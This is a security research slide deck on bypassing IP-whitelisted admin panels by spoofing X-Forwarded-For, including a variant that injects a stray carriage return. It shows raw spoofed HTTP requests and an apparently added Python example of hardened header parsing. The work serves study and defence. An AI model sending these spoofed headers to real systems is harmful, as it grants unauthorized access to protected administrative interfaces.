At Home Among Strangers
Bo0oM
December 06, 2019
Research
Bypassing IP whitelists of some web applications due to incorrect parsing of HTTP request headers.
Transcript
At Home Among Strangers
Bypassing IP whitelists of some web applications due to incorrect parsing of HTTP request headers.

Reverse Proxy

    X-Forwarded-For: <client>, <proxy>
    X-Forwarded-For: <fake>, <client>, <proxy>

HTTP-request

    What the client sends:

    GET / HTTP/1.1
    Host: admin.my.site
    Connection: close

    What the backend receives after the reverse proxy:

    GET / HTTP/1.1
    Host: admin.my.site
    X-Forwarded-For: 123.123.123.123, 192.168.1.1
    Connection: close

    X-Forwarded-For: <client>, <proxy>

XFF/XRI Spoofing

    What the client sends:

    GET / HTTP/1.1
    Host: admin.my.site
    X-Forwarded-For: 127.0.0.1
    Connection: close

    What the backend receives after the reverse proxy:

    GET / HTTP/1.1
    Host: admin.my.site
    X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1
    Connection: close

    X-Forwarded-For: <fake>, <client>, <proxy>

HTTP-request (raw bytes)

    GET / HTTP/1.1\r\n
    Host: admin.my.site\r\n
    X-Forwarded-For: 127.0.0.1\r\n
    Connection: close\r\n
    \r\n

    X-Forwarded-For: <fake>, <client>, <proxy>

HTTP-request with 0d

    GET / HTTP/1.1\r\n
    Host: admin.my.site\r\n
    X-Forwarded-For: 127.0.0.1\r\r\n
    Connection: close\r\n
    \r\n

    X-Forwarded-For: <fake>\r, <client>, <proxy>

XFF/XRI Spoofing+

    What the client sends:

    GET / HTTP/1.1\r\n
    Host: admin.my.site\r\n
    X-Forwarded-For: 127.0.0.1\r\r\n
    Connection: close\r\n
    \r\n

    What the backend receives after the reverse proxy (the stray 0x0d survives as a trailing character of the first entry):

    GET / HTTP/1.1
    Host: admin.my.site
    X-Forwarded-For: 127.0.0.1 , 123.123.123.123, 192.168.1.1
    Connection: close

    X-Forwarded-For: <fake> , <client>, <proxy>

    Tomcat? WebSphere?
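As an added defender-side example (not code from the deck or from any of the servers it names), the Python below contrasts the leftmost-entry parsing the deck abuses with a parser that walks the X-Forwarded-For chain from the right, skips only hops inside an assumed proxy range (192.168.1.0/24), and rejects any value carrying a stray CR or other control byte; the header values are constructed from the slides.

```python
import ipaddress

# Constructed samples modelled on the slides: the value the backend sees after
# the reverse proxy appends <client>, <proxy> to what the client supplied.
HONEST_XFF = "123.123.123.123, 192.168.1.1"
SPOOFED_XFF = "127.0.0.1, 123.123.123.123, 192.168.1.1"
SPOOFED_XFF_CR = "127.0.0.1\r, 123.123.123.123, 192.168.1.1"  # the "0d" variant

# Assumed: the only hosts allowed to append to the chain are our own proxies.
TRUSTED_PROXIES = [ipaddress.ip_network("192.168.1.0/24")]


def naive_client_ip(xff: str) -> str:
    """The pattern the deck exploits: trust the leftmost entry after a loose strip.

    str.strip() silently discards the injected '\\r', so the fake 127.0.0.1
    passes a whitelist check untouched."""
    return xff.split(",")[0].strip()


def hardened_client_ip(xff: str, trusted=TRUSTED_PROXIES):
    """Return the nearest hop that is NOT one of our proxies, or None if the
    header is malformed. Only entries appended by trusted proxies are believed."""
    # CR, LF and other control bytes never belong in a header value; treat
    # their presence as tampering rather than whitespace to be stripped.
    if any(ord(c) < 0x20 or c == "\x7f" for c in xff):
        return None
    hops = [h.strip(" \t") for h in xff.split(",")]
    try:
        addrs = [ipaddress.ip_address(h) for h in hops]
    except ValueError:  # any unparsable entry invalidates the whole chain
        return None
    # Walk from the right: the rightmost entries were written by our proxies,
    # the first untrusted one is the real client. Anything left of it is
    # client-controlled and ignored.
    for addr in reversed(addrs):
        if not any(addr in net for net in trusted):
            return addr
    return None


def is_whitelisted(xff: str, whitelist) -> bool:
    """Whitelist decision based on the hardened parser (malformed -> deny)."""
    client = hardened_client_ip(xff)
    return client is not None and any(client in net for net in whitelist)


if __name__ == "__main__":
    allow = [ipaddress.ip_network("127.0.0.1/32")]
    for value in (HONEST_XFF, SPOOFED_XFF, SPOOFED_XFF_CR):
        print(repr(value), naive_client_ip(value), hardened_client_ip(value),
              is_whitelisted(value, allow))
```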
Contacts

    Twitter: @i_bo0om
    Site: bo0om.ru
    Telegram: @webpwn